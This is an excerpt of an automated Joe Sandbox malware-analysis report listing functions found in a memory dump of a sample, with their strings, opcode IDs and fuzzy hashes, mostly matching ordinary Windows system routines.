                                                                                                                                                                                                                                                                Function 3391F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID: $$$
                                                                                                                                                                                                                                                                • API String ID: 3446177414-233714265
                                                                                                                                                                                                                                                                • Opcode ID: 29a804e3c8005cbc01a12965ae443281adcbc7141bbd6a52d27ab657a06f1d42
                                                                                                                                                                                                                                                                • Instruction ID: c4c83938f9e036bb28c49e35f6ce62d2d08b8cf4d8051d54b9c6c99717f32a30
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29a804e3c8005cbc01a12965ae443281adcbc7141bbd6a52d27ab657a06f1d42
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F461CC76E01B4ECFEB20DFA8C580B99B7F5BF44354F144269D116BBA92CB74A950CB80
                                                                                                                                                                                                                                                                Function 3390A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 3390A229
                                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 3390A21B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                                                                                                • Opcode ID: 646ad53e8803e67cdadda4a6e6079bca0d387e8ef6d0eb11c0a5d4f9aa82cd88
                                                                                                                                                                                                                                                                • Instruction ID: 94a111a1dc3112ecbccc46bbafa56acdc07581230140c6a63f67e7548cb32509
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 646ad53e8803e67cdadda4a6e6079bca0d387e8ef6d0eb11c0a5d4f9aa82cd88
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A41ED75A01704CBEB11CFA9C980B5A77B8EF857A4F1840A5EC80DF2A1E73AC914CB80
                                                                                                                                                                                                                                                                Function 3399314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                                                                • API String ID: 0-118005554
                                                                                                                                                                                                                                                                • Opcode ID: 95fe0eb2d490c288e3377d2203f1118e1dd6805c18350cfcabfd4f0d7c88c578
                                                                                                                                                                                                                                                                • Instruction ID: df6e2d845a30a3981284ba8fa8972099e939f242349fe34233b81bfcec126413
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95fe0eb2d490c288e3377d2203f1118e1dd6805c18350cfcabfd4f0d7c88c578
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B031FE76608741CBE311CF69D880B5AB7E8EF88790F08086AFC54CB391EB30D905CB52
                                                                                                                                                                                                                                                                Function 339331BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .Local\$@
                                                                                                                                                                                                                                                                • API String ID: 0-380025441
                                                                                                                                                                                                                                                                • Opcode ID: db858be16eabe910752fb8ea04fd4894057b1b276d409983409863b5b3e4cd8e
                                                                                                                                                                                                                                                                • Instruction ID: a60fd1a6931d9466ff4de9373e72a18977de1c888c02e7eda0a8144766246f10
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db858be16eabe910752fb8ea04fd4894057b1b276d409983409863b5b3e4cd8e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F3186B598D305DFD311CF28C4C0A5BBBE8FB8A6A4F44052EF99497251D634DD058BD2
                                                                                                                                                                                                                                                                Function 339333D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RtlpInitializeAssemblyStorageMap, xrefs: 3397289A
                                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3397289F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                                                                                • API String ID: 0-2653619699
                                                                                                                                                                                                                                                                • Opcode ID: 807c275aa1c3316e7d2fb419b6240ea1e1abbc9923e0bf8f6bf44037125827cc
                                                                                                                                                                                                                                                                • Instruction ID: e89806f355d20c30da98c52ad5ab1f0e2668019513c02a68cd900f4eb76e800d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 807c275aa1c3316e7d2fb419b6240ea1e1abbc9923e0bf8f6bf44037125827cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 831106B6F15304FBE7158B488C84F9A77ACDB897A0F188029B904EB285DA75CD0087A0
                                                                                                                                                                                                                                                                Function 3390C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                                                                                                • Opcode ID: ba3cfe8079f6c6c1efbbbc7301d53fc47138f5b1947c15a20adec019314aa8b8
                                                                                                                                                                                                                                                                • Instruction ID: 29fc04757fdcd1ed774e9950768a08c62f4f7043e6a8239f9a297c28baa14b4e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba3cfe8079f6c6c1efbbbc7301d53fc47138f5b1947c15a20adec019314aa8b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2825B79E00319DFEB24CFA9C98079DB7B9BF48390F148169E859AB251DB309985CF50
                                                                                                                                                                                                                                                                Function 3392E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 80be7d6d963281ca7ae75cda9e206548f3b0396c027b1451b825e0a0e17f4dc4
                                                                                                                                                                                                                                                                • Instruction ID: 290729ada9ab28cf94a4f79bbb61a47cedfccd16a7cf280b7fc0a969acad4f1c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80be7d6d963281ca7ae75cda9e206548f3b0396c027b1451b825e0a0e17f4dc4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19A11771E01718DFFB21DB94C884B9D7BA8EF08BA8F090255E951FB295D7749D44CB80
                                                                                                                                                                                                                                                                Function 33901051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 69b9abd97a3468590476aafac473ad8aceedf67b8f2f636ed5c41550ffb3c6f2
                                                                                                                                                                                                                                                                • Instruction ID: 8c9f5ce3eee4294bba691447fbf0f90da2365345afcad7ac4301cfb8e47cc065
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69b9abd97a3468590476aafac473ad8aceedf67b8f2f636ed5c41550ffb3c6f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18B112B5A08341CFE354CF28C480A5ABBF5BB88354F184A6EF899D7352D771E885CB42
                                                                                                                                                                                                                                                                Function 33907623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d431f2871e1300fe13bcdaef68acbe20645e04209f2d2d786bf93d0760110996
                                                                                                                                                                                                                                                                • Instruction ID: 355346942a10deec41094f6b2cf358a2ea7ced6f4441db2b562362de37e2a630
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d431f2871e1300fe13bcdaef68acbe20645e04209f2d2d786bf93d0760110996
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10614075E05706EFDB08DF6CC880A9DFBB9BF48394F24816AE459A7341DB30A9518F90
                                                                                                                                                                                                                                                                Function 33904779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 3209c4f0459a76fd8dfebc2ecc8c04c65653e2c0e07916f54e984e194c4e42a1
                                                                                                                                                                                                                                                                • Instruction ID: 1cc47970aa04ad2d88cba0547643758d8366ecf7921e52a2ff033a74af805df9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3209c4f0459a76fd8dfebc2ecc8c04c65653e2c0e07916f54e984e194c4e42a1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6741C0B4A04341CBE314DF28D8D4B2ABBEEEF81791F14482DE9419B2A1DB30D891CF91
                                                                                                                                                                                                                                                                Function 339056E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 64c9fadd54c05d7e1bc412b75415fbdc91c97a56deb2b10a701c8ecec688af5a
                                                                                                                                                                                                                                                                • Instruction ID: e1955456c9e8388a7e6ebfa0dfcf1c14ff9b03309d4ab53f3aef1728f6b86984
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64c9fadd54c05d7e1bc412b75415fbdc91c97a56deb2b10a701c8ecec688af5a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A331CF75B1AB05FFE7059B24CA80A99BBA9FF88294F445055EC008BF51CB35E830CF80
                                                                                                                                                                                                                                                                Function 339AE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 61fadab21f85445e4120929e9f01b0e6f63a3a566e71bba35f5d118fae035edc
                                                                                                                                                                                                                                                                • Instruction ID: 09213bbdf2676a6e4f3b0e4ae285a2961f49d284d18df330e6ca242b2e0802db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61fadab21f85445e4120929e9f01b0e6f63a3a566e71bba35f5d118fae035edc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E43137B6D05305CFC700DF1DC44094ABBF9FF89695F4886AEE488AB261D631D905CF92
                                                                                                                                                                                                                                                                Function 3398A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: ee61b0253bc34d93bbc10a39ed4ea39051ca74b1236f0691fa51cf58b20d4690
                                                                                                                                                                                                                                                                • Instruction ID: 43bb70fc305637dcdbf05309953b79a0b6a939fc33a39c8e0978dcfc6cfe3f7e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee61b0253bc34d93bbc10a39ed4ea39051ca74b1236f0691fa51cf58b20d4690
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E014936511259EBDF129E84C840EDA3B6AFB4C794F058111FE186A220C636E971EB80
                                                                                                                                                                                                                                                                Function 338F92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                                                • Opcode ID: 4b9ea85ab11ebd44ad5c397a4700aeeb63b28f096608445b437def3144cf9db1
                                                                                                                                                                                                                                                                • Instruction ID: 5e8ce0f1983042b87f9bc13f27e4550eb6a663dc22c635706d444b612a0575b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b9ea85ab11ebd44ad5c397a4700aeeb63b28f096608445b437def3144cf9db1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12F0F032200704ABD3319B99DC04F9BBBFDEF84700F080119A55293491D6B1F90AC650
                                                                                                                                                                                                                                                                Function 3393A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: GlobalTags
                                                                                                                                                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                                                                                                                                                • Opcode ID: db799d2e8667fd215a1e85d56fd2994bb267da0d561f45c2116da6e53ce7d037
                                                                                                                                                                                                                                                                • Instruction ID: 152626a39a4b0329859ea4219e32762f871ddb51b0379fe5eff391082fe09a9c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db799d2e8667fd215a1e85d56fd2994bb267da0d561f45c2116da6e53ce7d037
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24717DB9E0030ADFEF14DF98C98069DBBB5BF48790F54812EE845A7285EB318941CB50
                                                                                                                                                                                                                                                                Function 3390965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                                                                                                • Instruction ID: de57fdf486fe50890e45da75179344ba74907e6665bdddc168dff1ea2ddcc165
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99613BB6D01319EFDB11DFA9C840BDEBBB9EF84754F14415AE850AB260D7749A01CFA0
                                                                                                                                                                                                                                                                Function 339102F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #%u
                                                                                                                                                                                                                                                                • API String ID: 0-232158463
                                                                                                                                                                                                                                                                • Opcode ID: bb3b8e345d5a045dec166324a6d17362be53ec753bb6544e2e2e409a66217998
                                                                                                                                                                                                                                                                • Instruction ID: 997b905ec8a14efa1f284bb380a40b950c12a5755c8adfd2ed0e67cd891d0896
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb3b8e345d5a045dec166324a6d17362be53ec753bb6544e2e2e409a66217998
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA713872E0120ADFDB05CFA9C980BAEB7F8BF08744F154069E901FB651EA34E951CB60
                                                                                                                                                                                                                                                                Function 339341BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000003.00000002.17223941373.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000003.00000002.17223941373.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_338d0000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                                                                                • Instruction ID: 1aa8d90b731ee809c0bc59e7e630596ada9698c310017a306b11d66af1a2793a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
